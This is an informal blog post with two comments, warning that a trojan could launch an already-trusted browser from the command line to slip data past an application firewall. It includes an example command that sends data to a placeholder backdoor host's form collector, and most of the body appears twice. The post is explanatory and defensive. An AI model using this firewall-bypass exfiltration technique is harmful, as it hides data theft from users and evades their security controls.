Command-line Internet access
Everyone who has half a brain uses a firewall. Even M$ gave you a free (but kinda useless) firewall called Windows Firewall (or Windows Defender on Vista). However, most software firewalls like ZoneAlarm are application firewalls first, meaning they block or allow based on the application trying to get access. What's one of the first applications you allow thru the firewall? IEXPLORE.EXE (Windows Internet Explorer), FIREFOX.EXE (Mozilla Firefox) and Opera (OPERA.EXE).
Did you know it's possible to use these exe to execute and access the internet without you knowing? No popup, no fancy GUI window nothing. And because your firewall already allowed it, you don't even know the internet was being accessed.
For example: C:\Progra~1\Intern~1\iexplore.exe http://mybackdoorhost.domain.com/formcollector.php?name=value&
This will fire up IEXPLORE on the command line and access a webform on my website to dump data. If I had a trojan in your PC, my EXE need only fire up this on the command line to grab info from you. No need to learn how to code for HTTP, FTP, etc, just use IEXPLORE, and best part since you already allow access through the firewall, I dun even need to worry about hooking and stuff.
Wonderful right? Think you're safe? Think again!!
So what's the solution here? Hard to say really. How to block a possible trojan like this yet allow yourself internet access? You can't say dun use iexplore use firefox instead, cuz the trojan can try both. Frankly, the IT systems we normal people use today (Windows OS) is totally inadequate to prevent such attacks. All of us are vulnerable to this, regardless, unless you tell me you dun use internet.
One possible solution is to change your internet surfing habits. Use an old PC, run Linux or Mac, use that for Internet surfing or your personal email and stuff. Confidential info stuff AND dun ever ever download files or plug in thumbdrives into that PC. Then you have another PC for your online gaming and chat and stuff. Lessen the damage only but still lessen.
How about Vista? Sadly I dunno, but I suspect UAC on Vista *can* help in this regard. Still exploring it on my *ahem* copy, keep you posted.
Did you know it's possible to use these exe to execute and access the internet without you knowing? No popup, no fancy GUI window nothing. And because your firewall already allowed it, you don't even know the internet was being accessed.
For example: C:\Progra~1\Intern~1\iexplore.exe http://mybackdoorhost.domain.com/formcollector.php?name=value&
This will fire up IEXPLORE on the command line and access a webform on my website to dump data. If I had a trojan in your PC, my EXE need only fire up this on the command line to grab info from you. No need to learn how to code for HTTP, FTP, etc, just use IEXPLORE, and best part since you already allow access through the firewall, I dun even need to worry about hooking and stuff.
Wonderful right? Think you're safe? Think again!!
So what's the solution here? Hard to say really. How to block a possible trojan like this yet allow yourself internet access? You can't say dun use iexplore use firefox instead, cuz the trojan can try both. Frankly, the IT systems we normal people use today (Windows OS) is totally inadequate to prevent such attacks. All of us are vulnerable to this, regardless, unless you tell me you dun use internet.
One possible solution is to change your internet surfing habits. Use an old PC, run Linux or Mac, use that for Internet surfing or your personal email and stuff. Confidential info stuff AND dun ever ever download files or plug in thumbdrives into that PC. Then you have another PC for your online gaming and chat and stuff. Lessen the damage only but still lessen.
How about Vista? Sadly I dunno, but I suspect UAC on Vista *can* help in this regard. Still exploring it on my *ahem* copy, keep you posted.
posted by Beng Hacks at 8:24 PM
2 Comments:
what about malware removal/ protection software?
What about it? How is Internet Explorer considered malware?
Remember the cardinal rule of protection software: it protects you based on *known* signatures.
Post a Comment
<< Home